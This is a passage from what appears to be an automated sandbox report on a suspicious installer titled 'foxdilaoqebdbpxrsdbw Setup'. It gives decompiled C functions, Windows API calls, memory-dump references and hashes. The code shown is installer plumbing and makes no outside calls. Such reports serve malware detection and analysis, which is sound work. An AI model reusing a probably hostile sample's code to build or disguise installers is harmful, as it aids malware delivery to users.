                    • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401CC1(int __edx) {
                    				void* _t17;
                    				struct HINSTANCE__* _t21;
                    				struct HWND__* _t25;
                    				void* _t27;
                    
                    				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                    				GetClientRect(_t25, _t27 - 0x40);
                    				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                    				if(_t17 != _t21) {
                    					DeleteObject(_t17);
                    				}
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
                    				return 0;
                    			}

                    Addresses: 0x00401ccb, 0x00401cd2, 0x00401d01, 0x00401d09, 0x00401d10, 0x00401d10, 0x00402880, 0x0040288c

                    APIs
                    • GetDlgItem.USER32 ref: 00401CC5
                    • GetClientRect.USER32 ref: 00401CD2
                    • LoadImageA.USER32 ref: 00401CF3
                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                    • DeleteObject.GDI32(00000000), ref: 00401D10
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                    • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                    • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                    • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegEnumKeyExW.ADVAPI32(00000000,?,?,00000027,00000000,00000000,00000000,00000000), ref: 1000324E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Enum
                    • String ID: '$(%p)
                    • API String ID: 2928410991-2641672736
                    • Opcode ID: 94c282256b7f3b49bc3155e1eb230b097978b9f0df0f6366f9ca0e668ebe65e8
                    • Instruction ID: 7aa88cec2dbe9ccd791f5a24b7b6245e1e359b2b5314ea5d7ca56f7c7b73cf05
                    • Opcode Fuzzy Hash: 94c282256b7f3b49bc3155e1eb230b097978b9f0df0f6366f9ca0e668ebe65e8
                    • Instruction Fuzzy Hash: AF4129B4D00209EFEB05CF98C885B9EB7F5FB48354F20C569E815AB285C774AA80DF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegEnumKeyExW.ADVAPI32(00000000,?,?,00000027,00000000,00000000,00000000,00000000), ref: 10002D07
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Enum
                    • String ID: '$(%p)
                    • API String ID: 2928410991-2641672736
                    • Opcode ID: 4ec39bc652aef9e7fa54e1d2a95a4b1d9a2249147b67659f0b7d2a9bde22418e
                    • Instruction ID: 0be5fee5dc31161cd6fcb7127ce0d1fe7e156a0d2cbc7c6b4b745bafd8668ceb
                    • Opcode Fuzzy Hash: 4ec39bc652aef9e7fa54e1d2a95a4b1d9a2249147b67659f0b7d2a9bde22418e
                    • Instruction Fuzzy Hash: 553108B4900209EFEB14CF94C888BEEB7F5FB44345F20855AE9056B285D774AE84DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
                    				char _v36;
                    				char _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t26;
                    				void* _t34;
                    				signed int _t36;
                    				signed int _t39;
                    				unsigned int _t46;
                    
                    				_t46 = _a12;
                    				_push(0x14);
                    				_pop(0);
                    				_t34 = 0xffffffdc;
                    				if(_t46 < 0x100000) {
                    					_push(0xa);
                    					_pop(0);
                    					_t34 = 0xffffffdd;
                    				}
                    				if(_t46 < 0x400) {
                    					_t34 = 0xffffffde;
                    				}
                    				if(_t46 < 0xffff3333) {
                    					_t39 = 0x14;
                    					asm("cdq");
                    					_t46 = _t46 + 1 / _t39;
                    				}
                    				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
                    				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
                    				_t21 = _t46 & 0x00ffffff;
                    				_t36 = 0xa;
                    				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                    				_push(_t46 >> 0);
                    				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
                    				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
                    				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
                    			}

                    Addresses: 0x004044be, 0x004044c2, 0x004044ca, 0x004044cd, 0x004044ce, 0x004044d0, 0x004044d2, 0x004044d5, 0x004044d5, 0x004044dc, 0x004044e2, 0x004044e2, 0x004044e9, 0x004044f4, 0x004044f5, 0x004044f8, 0x004044f8, 0x00404505, 0x00404510, 0x00404513, 0x00404525, 0x0040452c, 0x0040452d, 0x0040453c, 0x0040454c, 0x00404568

                    APIs
                    • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                    • wsprintfA.USER32 ref: 0040454C
                    • SetDlgItemTextA.USER32 ref: 0040455F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                    • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                    • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                    • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E00401BAD() {
                    				signed int _t28;
                    				CHAR* _t31;
                    				long _t32;
                    				int _t37;
                    				signed int _t38;
                    				int _t42;
                    				int _t48;
                    				struct HWND__* _t52;
                    				void* _t55;
                    
                    				 *(_t55 - 0x34) = E004029CB(3);
                    				 *(_t55 + 8) = E004029CB(4);
                    				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                    					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                    				}
                    				__eflags =  *(_t55 - 0x10) & 0x00000002;
                    				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                    					 *(_t55 + 8) = E004029E8(0x44);
                    				}
                    				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                    				_push(1);
                    				if(__eflags != 0) {
                    					_t50 = E004029E8();
                    					_t28 = E004029E8();
                    					asm("sbb ecx, ecx");
                    					asm("sbb eax, eax");
                    					_t31 =  ~( *_t27) & _t50;
                    					__eflags = _t31;
                    					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                    					goto L10;
                    				} else {
                    					_t52 = E004029CB();
                    					_t37 = E004029CB();
                    					_t48 =  *(_t55 - 0x10) >> 2;
                    					if(__eflags == 0) {
                    						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                    						L10:
                    						 *(_t55 - 8) = _t32;
                    					} else {
                    						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                    						asm("sbb eax, eax");
                    						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                    					}
                    				}
                    				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                    				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                    					_push( *(_t55 - 8));
                    					E00405889();
                    				}
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
                    				return 0;
                    			}

                    Addresses: 0x00401bb6, 0x00401bc2, 0x00401bc5, 0x00401bce, 0x00401bce, 0x00401bd1, 0x00401bd5, 0x00401bde, 0x00401bde, 0x00401be1, 0x00401be5, 0x00401be7, 0x00401c34, 0x00401c36, 0x00401c3f, 0x00401c47, 0x00401c4a, 0x00401c4a, 0x00401c53, 0x00000000, 0x00401be9, 0x00401bf0, 0x00401bf2, 0x00401bfa, 0x00401bfd, 0x00401c25, 0x00401c59, 0x00401c59, 0x00401bff, 0x00401c0d, 0x00401c15, 0x00401c18, 0x00401c18, 0x00401bfd, 0x00401c5c, 0x00401c5f, 0x00401c65, 0x00402825, 0x00402825, 0x00402880, 0x0040288c

                    APIs
                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                    • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                    • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                    • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040373D(void* __ecx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed short _t6;
                    				intOrPtr _t11;
                    				signed int _t13;
                    				intOrPtr _t15;
                    				signed int _t16;
                    				signed short* _t18;
                    				signed int _t20;
                    				signed short* _t23;
                    				intOrPtr _t25;
                    				signed int _t26;
                    				intOrPtr* _t27;
                    
                    				_t24 = "1033";
                    				_t13 = 0xffff;
                    				_t6 = E004058A2(__ecx, "1033");
                    				while(1) {
                    					_t26 =  *0x42eba4; // 0x1
                    					if(_t26 == 0) {
                    						goto L7;
                    					}
                    					_t15 =  *0x42eb70; // 0x6bfe70
                    					_t16 =  *(_t15 + 0x64);
                    					_t20 =  ~_t16;
                    					_t18 = _t16 * _t26 +  *0x42eba0;
                    					while(1) {
                    						_t18 = _t18 + _t20;
                    						_t26 = _t26 - 1;
                    						if((( *_t18 ^ _t6) & _t13) == 0) {
                    							break;
                    						}
                    						if(_t26 != 0) {
                    							continue;
                    						}
                    						goto L7;
                    					}
                    					 *0x42e340 = _t18[1];
                    					 *0x42ec08 = _t18[3];
                    					_t23 =  &(_t18[5]);
                    					if(_t23 != 0) {
                    						 *0x42e33c = _t23;
                    						E00405889(_t24,  *_t18 & 0x0000ffff);
                    						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "foxdilaoqebdbpxrsdbw Setup", 0xfffffffe));
                    						_t11 =  *0x42eb8c; // 0x2
                    						_t27 =  *0x42eb88; // 0x6c001c
                    						if(_t11 == 0) {
                    							L15:
                    							return _t11;
                    						}
                    						_t25 = _t11;
                    						do {
                    							_t11 =  *_t27;
                    							if(_t11 != 0) {
                    								_t5 = _t27 + 0x18; // 0x6c0034
                    								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
                    							}
                    							_t27 = _t27 + 0x418;
                    							_t25 = _t25 - 1;
                    						} while (_t25 != 0);
                    						goto L15;
                    					}
                    					L7:
                    					if(_t13 != 0xffff) {
                    						_t13 = 0;
                    					} else {
                    						_t13 = 0x3ff;
                    					}
                    				}
                    			}

                    Addresses: 0x00403741, 0x00403746, 0x0040374c, 0x00403751, 0x00403751, 0x00403759, 0x00000000, 0x00000000, 0x0040375b, 0x00403761, 0x00403769, 0x0040376b, 0x00403771, 0x00403771, 0x00403773, 0x0040377f, 0x00000000, 0x00000000, 0x00403783, 0x00000000, 0x00000000, 0x00000000, 0x00403785, 0x0040378a, 0x00403793, 0x00403799, 0x0040379e, 0x004037b2, 0x004037bd, 0x004037d5, 0x004037db, 0x004037e0, 0x004037e8, 0x00403809, 0x00403809, 0x00403809, 0x004037ea, 0x004037ec, 0x004037ec, 0x004037f0, 0x004037f3, 0x004037f7, 0x004037f7, 0x004037fc, 0x00403802, 0x00403802, 0x00000000, 0x004037ec, 0x004037a0, 0x004037a5, 0x004037ae, 0x004037a7, 0x004037a7, 0x004037a7, 0x004037a5

                    APIs
                    • SetWindowTextA.USER32(00000000,foxdilaoqebdbpxrsdbw Setup), ref: 004037D5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: TextWindow
                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\$foxdilaoqebdbpxrsdbw Setup
                    • API String ID: 530164218-1262221224
                    • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                    • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                    • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                    • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __woutput_l.LIBCMT ref: 1000DC4C
                      • Part of subcall function 1000ED0B: __getptd_noexit.LIBCMT ref: 1000ED0B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: __getptd_noexit__woutput_l
                    • String ID: B
                    • API String ID: 3669879410-1255198513
                    • Opcode ID: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                    • Instruction ID: fbd8d1061e38725011c376caf0138384800fd7262735a674211b68c59998f0bc
                    • Opcode Fuzzy Hash: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                    • Instruction Fuzzy Hash: CD11607190421E9EFF00EFA4DC819EEB7B8FF08390F10452BE914A6285DA759905DBB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 10002AB5
                    • HeapAlloc.KERNEL32(00000000), ref: 10002ABC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Heap$AllocProcess
                    • String ID: returning %p
                    • API String ID: 1617791916-1981732286
                    • Opcode ID: 83c3263b4b244c4a1becf6e84fac9a8af30131da4209d6ec79fa8e0fb91cc3f8
                    • Instruction ID: d4a4bba9fc9d1bbfa05beefd88f2027a165b8fe1b1f70f99caa14511e1079296
                    • Opcode Fuzzy Hash: 83c3263b4b244c4a1becf6e84fac9a8af30131da4209d6ec79fa8e0fb91cc3f8
                    • Instruction Fuzzy Hash: 091117B8A00208EFEB01CF94C945B99B7F0FB4A355F208199ED095B355D775DE80DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040518B(CHAR* _a4) {
                    				struct _PROCESS_INFORMATION _v20;
                    				int _t7;
                    
                    				0x42bfe0->cb = 0x44;
                    				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
                    				if(_t7 != 0) {
                    					CloseHandle(_v20.hThread);
                    					return _v20.hProcess;
                    				}
                    				return _t7;
                    			}
                    0x00405194
                    0x004051b0
                    0x004051b8
                    0x004051bd
                    0x00000000
                    0x004051c3
                    0x004051c7

                    APIs
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                    • CloseHandle.KERNEL32(?), ref: 004051BD
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                    • Error launching installer, xrefs: 0040519E
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                    • API String ID: 3712363035-2984075973
                    • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                    • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                    • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                    • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegCloseKey.ADVAPI32(?), ref: 10002B5B
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 10002B67
                    • HeapFree.KERNEL32(00000000), ref: 10002B6E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Heap$CloseFreeProcess
                    • String ID: destroying %p
                    • API String ID: 1203615452-3738993722
                    • Opcode ID: 6d15f0788334ef2255cfa17b069852f31fc2ceb94042b73c8a2980e361fda53b
                    • Instruction ID: 58fc8df40afe2e0d57ec830e951d8b7ecae17fade34ddf6017f64ed429094b49
                    • Opcode Fuzzy Hash: 6d15f0788334ef2255cfa17b069852f31fc2ceb94042b73c8a2980e361fda53b
                    • Instruction Fuzzy Hash: 18E0ECB9500218ABE701DF94DC89FE93BACEB4D755F048004FA0D8B201C671E9808BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040541E(CHAR* _a4) {
                    				CHAR* _t7;
                    
                    				_t7 = _a4;
                    				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                    					lstrcatA(_t7, 0x40900c);
                    				}
                    				return _t7;
                    			}
                    0x0040541f
                    0x00405436
                    0x0040543e
                    0x0040543e
                    0x00405446

                    APIs
                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                    • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-3916508600
                    • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                    • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                    • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                    • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10010A16
                    • __isleadbyte_l.LIBCMT ref: 10010A44
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010A72
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010AA8
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: e499e295a7154759c7b54a9426ad05987e38316d7012233a2c8bdeec80cf8705
                    • Instruction ID: 9172e219db3ae8b0e7704ad5d01474d674e6024ad38550cc8a5b2a4d4ef7600e
                    • Opcode Fuzzy Hash: e499e295a7154759c7b54a9426ad05987e38316d7012233a2c8bdeec80cf8705
                    • Instruction Fuzzy Hash: 4C319E30700386AFEB11CE61C844BAA7BE5FF41390F568129F8958B190E7B0E890DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00401EC5(char __ebx, char* __edi, char* __esi) {
                    				char* _t18;
                    				int _t19;
                    				void* _t30;
                    
                    				_t18 = E004029E8(0xffffffee);
                    				 *(_t30 - 0x2c) = _t18;
                    				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                    				 *__esi = __ebx;
                    				 *(_t30 - 8) = _t19;
                    				 *__edi = __ebx;
                    				 *((intOrPtr*)(_t30 - 4)) = 1;
                    				if(_t19 != __ebx) {
                    					__eax = GlobalAlloc(0x40, __eax);
                    					 *(__ebp + 8) = __eax;
                    					if(__eax != __ebx) {
                    						if(__eax != 0) {
                    							__ebp - 0x44 = __ebp - 0x34;
                    							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                    								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                    								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                    								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                    							}
                    						}
                    						_push( *(__ebp + 8));
                    						GlobalFree();
                    					}
                    				}
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                    				return 0;
                    			}
                    0x00401ec7
                    0x00401ecf
                    0x00401ed4
                    0x00401ed9
                    0x00401edd
                    0x00401ee0
                    0x00401ee2
                    0x00401ee9
                    0x00401ef2
                    0x00401efa
                    0x00401efd
                    0x00401f12
                    0x00401f18
                    0x00401f2b
                    0x00401f34
                    0x00401f40
                    0x00401f45
                    0x00401f45
                    0x00401f2b
                    0x00401f48
                    0x00401b75
                    0x00401b75
                    0x00401efd
                    0x00402880
                    0x0040288c

                    APIs
                    • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                    • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                    • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                      • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
